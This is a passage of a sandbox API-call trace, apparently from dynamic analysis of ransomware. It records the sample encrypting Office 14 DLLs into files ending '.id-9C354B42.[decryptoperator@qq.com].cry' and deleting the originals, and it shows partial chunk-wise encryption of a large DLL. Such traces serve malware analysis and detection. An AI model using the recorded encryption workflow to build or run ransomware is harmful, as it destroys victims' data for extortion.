[0054.239] lstrcmpiW (lpString1=".xlsx", lpString2="E.DLL") returned -1 [0054.239] lstrlenW (lpString=".ppt") returned 4 [0054.239] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0054.239] lstrlenW (lpString=".zip") returned 4 [0054.239] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.239] lstrlenW (lpString=".rar") returned 4 [0054.240] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.240] lstrlenW (lpString=".bz2") returned 4 [0054.240] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.240] lstrlenW (lpString=".7z") returned 3 [0054.240] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0054.240] lstrlenW (lpString=".dbf") returned 4 [0054.240] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0054.240] lstrlenW (lpString=".1cd") returned 4 [0054.240] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0054.240] lstrlenW (lpString=".jpg") returned 4 [0054.240] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.240] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0054.240] lstrlenW (lpString="ACEREP.DLL") returned 10 [0054.240] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0054.249] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=691616) returned 1 [0054.249] CloseHandle (hObject=0x194) returned 1 [0054.249] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll")) returned 0x20 [0054.249] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0054.250] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0054.250] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.250] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.250] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0054.251] GetLastError () returned 0x0 [0054.251] ReadFile (in: hFile=0x194, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0xa8da0, lpOverlapped=0x0) returned 1 [0054.408] WriteFile (in: hFile=0x190, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xa8db0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xa8db0, lpOverlapped=0x0) returned 1 [0054.421] ReadFile (in: hFile=0x194, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.421] WriteFile (in: hFile=0x190, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0054.421] SetEndOfFile (hFile=0x190) returned 1 [0054.421] CloseHandle (hObject=0x190) returned 1 [0054.422] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.422] SetEndOfFile (hFile=0x194) returned 1 [0054.429] CloseHandle (hObject=0x194) returned 1 [0054.429] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0054.429] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll")) returned 1 [0054.429] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0054.429] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0054.429] lstrlenW (lpString=".doc") returned 4 [0054.429] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.429] lstrlenW (lpString=".docx") returned 5 [0054.430] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1 [0054.430] lstrlenW (lpString=".pdf") returned 4 [0054.430] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.430] lstrlenW (lpString=".xls") returned 4 [0054.430] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.430] lstrlenW (lpString=".xlsx") returned 5 [0054.430] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1 [0054.430] lstrlenW (lpString=".ppt") returned 4 [0054.430] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0054.430] lstrlenW (lpString=".zip") returned 4 [0054.430] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.430] lstrlenW (lpString=".rar") returned 4 [0054.430] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.430] lstrlenW (lpString=".bz2") returned 4 [0054.430] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.430] lstrlenW (lpString=".7z") returned 3 [0054.430] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0054.430] lstrlenW (lpString=".dbf") returned 4 [0054.430] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0054.430] lstrlenW (lpString=".1cd") returned 4 [0054.430] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0054.430] lstrlenW (lpString=".jpg") returned 4 [0054.430] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0054.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0054.430] lstrlenW (lpString=".doc") returned 4 [0054.430] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.430] lstrlenW (lpString=".docx") returned 5 [0054.430] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1 [0054.430] lstrlenW (lpString=".pdf") returned 4 [0054.430] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.430] lstrlenW (lpString=".xls") returned 4 [0054.430] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.430] lstrlenW (lpString=".xlsx") returned 5 [0054.431] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1 [0054.431] lstrlenW (lpString=".ppt") returned 4 [0054.431] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0054.431] lstrlenW (lpString=".zip") returned 4 [0054.431] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.431] lstrlenW (lpString=".rar") returned 4 [0054.431] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.431] lstrlenW (lpString=".bz2") returned 4 [0054.431] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.431] lstrlenW (lpString=".7z") returned 3 [0054.431] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0054.431] lstrlenW (lpString=".dbf") returned 4 [0054.431] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0054.431] lstrlenW (lpString=".1cd") returned 4 [0054.431] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0054.431] lstrlenW (lpString=".jpg") returned 4 [0054.431] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.431] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0054.431] lstrlenW (lpString="ATLCONV.DLL") returned 11 [0054.431] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\atlconv.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0054.432] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=385368) returned 1 [0054.432] CloseHandle (hObject=0x194) returned 1 [0054.432] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\atlconv.dll")) returned 0x20 [0054.433] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\atlconv.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0054.433] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\atlconv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0054.433] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.433] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.433] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\atlconv.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0054.433] GetLastError () returned 0x0 [0054.433] ReadFile (in: hFile=0x194, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x5e158, lpOverlapped=0x0) returned 1 [0054.551] WriteFile (in: hFile=0x190, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0x5e160, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x5e160, lpOverlapped=0x0) returned 1 [0054.558] ReadFile (in: hFile=0x194, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.558] WriteFile (in: hFile=0x190, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0054.558] SetEndOfFile (hFile=0x190) returned 1 [0054.558] CloseHandle (hObject=0x190) returned 1 [0054.558] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.558] SetEndOfFile (hFile=0x194) returned 1 [0054.562] CloseHandle (hObject=0x194) returned 1 [0054.562] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0054.562] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\atlconv.dll")) returned 1 [0054.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0054.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0054.562] lstrlenW (lpString=".doc") returned 4 [0054.562] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.562] lstrlenW (lpString=".docx") returned 5 [0054.562] lstrcmpiW (lpString1=".docx", lpString2="V.DLL") returned -1 [0054.562] lstrlenW (lpString=".pdf") returned 4 [0054.562] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.562] lstrlenW (lpString=".xls") returned 4 [0054.562] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.562] lstrlenW (lpString=".xlsx") returned 5 [0054.562] lstrcmpiW (lpString1=".xlsx", lpString2="V.DLL") returned -1 [0054.562] lstrlenW (lpString=".ppt") returned 4 [0054.562] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0054.563] lstrlenW (lpString=".zip") returned 4 [0054.563] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.563] lstrlenW (lpString=".rar") returned 4 [0054.563] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.563] lstrlenW (lpString=".bz2") returned 4 [0054.563] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.563] lstrlenW (lpString=".7z") returned 3 [0054.563] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0054.563] lstrlenW (lpString=".dbf") returned 4 [0054.563] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0054.563] lstrlenW (lpString=".1cd") returned 4 [0054.563] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0054.563] lstrlenW (lpString=".jpg") returned 4 [0054.563] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0054.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0054.563] lstrlenW (lpString=".doc") returned 4 [0054.563] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.563] lstrlenW (lpString=".docx") returned 5 [0054.563] lstrcmpiW (lpString1=".docx", lpString2="V.DLL") returned -1 [0054.563] lstrlenW (lpString=".pdf") returned 4 [0054.563] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.563] lstrlenW (lpString=".xls") returned 4 [0054.563] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.563] lstrlenW (lpString=".xlsx") returned 5 [0054.563] lstrcmpiW (lpString1=".xlsx", lpString2="V.DLL") returned -1 [0054.563] lstrlenW (lpString=".ppt") returned 4 [0054.563] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0054.563] lstrlenW (lpString=".zip") returned 4 [0054.563] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.563] lstrlenW (lpString=".rar") returned 4 [0054.563] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.563] lstrlenW (lpString=".bz2") returned 4 [0054.563] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.564] lstrlenW (lpString=".7z") returned 3 [0054.564] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0054.564] lstrlenW (lpString=".dbf") returned 4 [0054.564] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0054.564] lstrlenW (lpString=".1cd") returned 4 [0054.564] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0054.564] lstrlenW (lpString=".jpg") returned 4 [0054.564] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.564] lstrcmpiW (lpString1=".dll", lpString2=".cry") returned 1 [0054.564] lstrlenW (lpString="Csi.dll") returned 7 [0054.564] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0054.590] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=5072816) returned 1 [0054.590] CloseHandle (hObject=0x194) returned 1 [0054.590] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll")) returned 0x20 [0054.591] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0054.591] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0054.591] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0054.591] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0x0) returned 1 [0054.591] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0054.591] ReadFile (in: hFile=0x194, lpBuffer=0x3950058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3950058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0054.742] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x19cd3a, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0054.742] ReadFile (in: hFile=0x194, lpBuffer=0x3990058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3990058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0054.912] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0054.913] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x4967b0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0054.913] ReadFile (in: hFile=0x194, lpBuffer=0x39d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x39d0058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0054.941] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.941] WriteFile (in: hFile=0x194, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xc00fa, lpNumberOfBytesWritten=0x2d9fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fcb0*=0xc00fa, lpOverlapped=0x0) returned 1 [0055.024] SetEndOfFile (hFile=0x194) returned 1 [0055.153] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3ef0060 [0055.153] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0055.153] WriteFile (in: hFile=0x194, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0055.156] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x19cd3a, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0055.156] WriteFile (in: hFile=0x194, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0055.159] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x4967b0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0055.159] WriteFile (in: hFile=0x194, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0055.160] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ef0060 | out: hHeap=0x600000) returned 1 [0055.161] CloseHandle (hObject=0x194) returned 1 [0055.161] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.161] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0055.161] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0055.161] lstrlenW (lpString=".doc") returned 4 [0055.161] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0055.161] lstrlenW (lpString=".docx") returned 5 [0055.161] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0055.161] lstrlenW (lpString=".pdf") returned 4 [0055.161] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0055.161] lstrlenW (lpString=".xls") returned 4 [0055.161] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0055.161] lstrlenW (lpString=".xlsx") returned 5 [0055.161] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0055.161] lstrlenW (lpString=".ppt") returned 4 [0055.161] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0055.161] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0055.161] lstrlenW (lpString=".zip") returned 4 [0055.161] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0055.161] lstrlenW (lpString=".rar") returned 4 [0055.161] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0055.161] lstrlenW (lpString=".bz2") returned 4 [0055.161] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0055.162] lstrlenW (lpString=".7z") returned 3 [0055.162] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0055.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0055.162] lstrlenW (lpString=".dbf") returned 4 [0055.162] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0055.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0055.162] lstrlenW (lpString=".1cd") returned 4 [0055.162] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0055.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 63 [0055.162] lstrlenW (lpString=".jpg") returned 4 